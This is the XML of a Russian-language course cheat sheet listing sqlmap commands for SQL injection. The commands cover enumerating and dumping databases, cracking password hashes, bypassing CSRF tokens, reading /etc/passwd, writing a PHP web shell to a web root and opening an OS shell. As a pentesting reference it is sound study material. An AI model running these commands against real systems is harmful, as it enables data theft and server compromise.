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B634" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="005527A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="192330"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="CAD2E2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005527A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="CAD2E2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>  Шпаргалка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FB338" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="005527A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="192330"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A4B1CD"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005527A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A4B1CD"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Шпаргалка — полезный справочник команд для этого модуля.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="980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  <w:gridCol w:w="2997"/>
      </w:tblGrid>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="30EA4748" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="278"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr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4F3B4C60" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="00552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4B1CD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b/>
                <w:bCs/>
                <w:color w:val="A4B1CD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1A2332"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="1A2332"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EDE155" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="00552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4B1CD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b/>
                <w:bCs/>
                <w:color w:val="A4B1CD"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="59549C89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6BD60FC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-h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A3E767E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Просмотреть основное меню справки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="25DE1B94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E0608A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88733E1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Просмотреть расширенное меню справки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="4C9FDE9A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4D4B243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"http://www.example.com/vuln.php?id=1" --batch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EC7A8B3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Работать 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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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запроса на ввод данных пользователем</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="429DB4E1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C2B924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'http://www.example.com/' --data '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uid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=1&amp;name=test'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E97DA48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spellEnd"/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POST-запросом</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="15DC27F6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730E279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'http://www.example.com/' --data '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uid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=1*&amp;name=test'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96D016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POST, указывающий точку инъекции со звездочкой</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="4AC359E1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9F5C3C9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-r req.txt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464D16F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файла HTTP-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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запроса</w:t>
            </w:r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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="7AF5300E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35BDC50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... --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cookie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='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'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61FBF28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Указание заголовка </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="44A62DB5" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="29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B4170B7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www.target.com --data='id=1' --method PUT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88DD80D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Указание запроса PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="67C18491" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="556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634616E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"http://www.target.com/vuln.php?id=1" --batch -t /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tmp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/traffic.txt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28A894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трафика в выходном файле</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="32DBCB33" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="29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607A0B8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"http://www.target.com/vuln.php?id=1" -v 6 --batch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DAD77D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Укажите уровень детализации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="2154B1FE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50F37AC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"www.example.com/?q=test" --prefix="%'))" --suffix="-- -"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D79AA7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Указание префикса или суффикса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="4310F024" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="29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93D0F07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www.example.com/?id=1 -v 3 --level=5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6764A65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Указание уровня и риска</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="248173E9" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="43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BD95AAF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--banner --current-user --current-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db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--is-dba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C78E1F6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перечень БД</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="65FBA7D2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5486772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--tables -D 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testdb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5B543ED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Перечисление таблиц</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="1A1870CF" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="43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262237F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--dump -T users -D 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testdb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-C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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name,surname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09F86A73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Перечисление таблиц/строк</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="7293E3DE" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="43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6AC740E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--dump -T users -D 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testdb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--where="name LIKE 'f%'"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0ED16E4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Условное перечисление</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="2095FD7A" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="29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E99C0F2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--schema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B8BE326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Перечисление схемы базы данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="319992D5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3529EE8A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--search -T user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4B0E6F9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данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="6BC08FC6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6BA2CDF1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--passwords --batch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FC38B36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Перебор и взлом паролей</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="57D4CAA4" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="44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5558941E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-u "http://www.example.com/" --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data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="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id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=1&amp;csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --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csrf-token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="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csrf-token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2372009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Обход токена Anti-CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="2DA7D43C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96ED976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 xml:space="preserve"> --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list-tampers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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C993C36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скриптов взлома</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="54859486" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="572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A85DBDD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"http://www.example.com/case1.php?id=1" --is-dba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C506D80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Проверьте наличие привилегий DBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="3D90C7A0" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="278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9FCE65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--file-read "/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/passwd"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44BDB9E1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локального файла</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="6F4D1F67" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="43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6472BA0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--file-write "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shell.php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 --file-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dest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"/var/www/html/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shell.php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2361858C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файла</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005527A1" w:rsidRPr="005527A1" w14:paraId="29A73EE2" w14:textId="77777777" w:rsidTr="005527A1">
        <w:trPr>
          <w:trHeight w:val="293"/>
          <w:jc w:val="center"/>
        </w:trPr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7CBAA08F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sqlmap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 xml:space="preserve"> -u "http://www.example.com/?id=1" --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005527A1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-shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="1A2332"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAE8EC1" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="00552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2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оболочки ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F9B2E70" w14:textId="77777777" w:rsidR="005527A1" w:rsidRPr="005527A1" w:rsidRDefault="005527A1" w:rsidP="005527A1"/>
    <w:sectPr w:rsidR="005527A1" w:rsidRPr="0055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1"/>
    <w:rsid w:val="0055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93C6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9F817C21-1410-4477-8567-B3A2D358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527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527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5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7A1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00552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2025-03-05T06:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-05T06:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>